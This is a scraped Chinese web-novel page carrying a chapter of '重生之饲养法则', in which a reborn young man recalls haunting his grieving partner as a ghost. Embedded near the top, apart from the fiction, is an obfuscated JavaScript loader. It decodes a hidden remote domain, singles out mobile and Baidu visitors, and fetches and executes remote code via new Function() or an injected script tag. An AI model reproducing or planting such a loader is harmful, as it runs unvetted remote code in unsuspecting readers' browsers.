躺着看小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2RqYnZza2p2ZHMuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

重生之饲养法则_59(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

半响后,萧夏终于颤微着开口:“但这不会是最后一次……”

黑暗中划过一抹暗哑的光亮,沈檀夕眼神一变。

“你又预知了什么事情?!”

耳中嗡鸣作响,萧夏被吼得全身一颤,而身后也已经没了退路。

忽然,他瞪大的双眼在闪过一丝精光后迅速灰暗,记忆随之如同崩溃的河堤一般,接着瞬间席卷了大脑。他终于拼凑齐出前生记忆力的最后一块碎片,也终于找到了一直以来对沈檀夕那种莫名恐惧的关键源头——但那不是他的预知,而是一段无法解释的梦一般的记忆……萧夏的第一世虽然只有三十五年,但却过的非常幸福圆满,因为身体一直都很不好,所以他自己本身也没有什么太大的理想,十六岁之后除了在沈檀夕的照料之下,就是在沈檀夕的能力照料之下过活,日子清闲而又平淡。

几乎是直到临死的时候,他才知道了那么多残忍的真相。

——但知道了真相又能如何?

沈檀夕给予他的爱和温情是这世上再无他人能企及的,纵使萧夏再单纯、再不成熟,心中也总会有一杆无法摆平的秤,所以即便是知道了他的爱人为他做出过疯狂的举动,他也愿意无条件的接受,更何况那些都是万不得已,他根本没有资格去责怪。

但令他万万没想到的是,这一切却没有随着他的释然而结束……诡异的重生并没有紧随在第一世的死亡之后,而实际上在重生后的好几个月之内,萧夏甚至都没察觉出自己是已经死过一次的人,很多记忆都是一点点拼凑起来的。从怀疑到惊恐,再到求证和后来的镇定,这一切算起来,足足有两年的时间。

记忆拼了又拼,直到二虎(第二只猫)的到来,他才终于把一切都拼凑完整——原来不止是欧阳宇,不止是李子木,也不止是强子!这个男人的凶残和暴力,根本超出了他的理解范围,曾经所有的温柔都只是一张假皮,沈檀夕给他看到的那一面只不过是精心伪装之后的!

而这个男人真正的本性,是直到他离去之后,才渐渐不加遮掩地浮现出来。

.................

当呼吸停止后第一次睁眼,萧夏并没有重回到十八岁的那年秋天,而是保持着一种在空中飘着的灵魂状态。

没有人看的到他,也听不见他的呼唤,更无法触碰到他,所有的一切都是单向的,只能看、只能听、只能凭着想象去触摸,而他就只是个虚无的存在而已。然而除此之外,还有一项制约,那就是他听不到沈檀夕的声音——无论是说话,还是哭或者笑,只要是关于沈檀夕的,萧夏就统统都听不到。

所以那个时候他只能飘荡在他的身边,单方面的看着他。

看他无声地抱着自己的尸体哭泣,看他无声地与医生咆哮,看他无声地坐在病床边守着自己的尸体独坐两天一夜,最后趴伏在空荡的病床上无声地嚎啕大哭。萧夏感受着沈檀夕的悲伤,可一伸手,意念稍微控制不好就会穿透他的身体,这令萧夏同样感到悲伤,但同时也更觉得无助。

因为没有人能来给他解释现在是怎么一回事,也无法得知这样的状态会维持多久,他生前所有的依靠,全都在眼前这个男人的身上,可现在他却碰不到他了,连他的声音也听不到,真是没有比这更可怕的事情了。

接下来在很长一段时间里,萧夏都安静地坐在沈檀夕的身边,就那样可怜兮兮地看着他,但很久很久都没有得到回应。

于是他伸出手小心翼翼地拥抱住他,就像从前那样——尽管他已经感受不到自己,但至少还可以假装自己能感受到他,从而在这种无助的环境下得到一丝安慰。

065 灵魂止步

后来沈檀夕离开医院,萧夏默默地跟在他身边。

但是上车的时候门关得有些快,差点撵到了他,他委屈地抱怨了一句,可沈檀夕却一直扭头看着窗外,从始至终都没朝他的方向看过一眼。萧夏觉得很难过,也很委屈,可是却没有眼泪掉下来,明明以前那么爱哭的,想忍都忍不住,偏偏现在却怎么也宣泄不出来,只能任由痛苦在心中积攒。

后来好不容易到了家,廉嫂准备了很丰盛的晚饭,但属于萧夏位置的那个椅子却并没有拉出来,更没有碗筷摆在那里,所以萧夏就只好站在那里,看着沈檀夕落座。

忽然,沈檀夕开口说了句什么,廉嫂赶忙应声,然后从厨房拿了套餐具出来摆在萧夏的位置上,沈檀夕亲自起身把那个位置的椅子拉出来,接着又对廉嫂吩咐了一句,廉嫂便连连应道:“好,好,都不动!以后都按原来的弄!”

萧夏低头盯着穿过自己身体的椅子好半天,然后才慢慢地坐了下来,但遗憾的是他拿不起筷子,只能看着沈檀夕吃。不过这也很好了,他已经围绕在沈檀夕的身边好几天了,都没怎么见到过他吃东西,这下回家好好吃顿饭,萧夏也觉得安心了不少。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间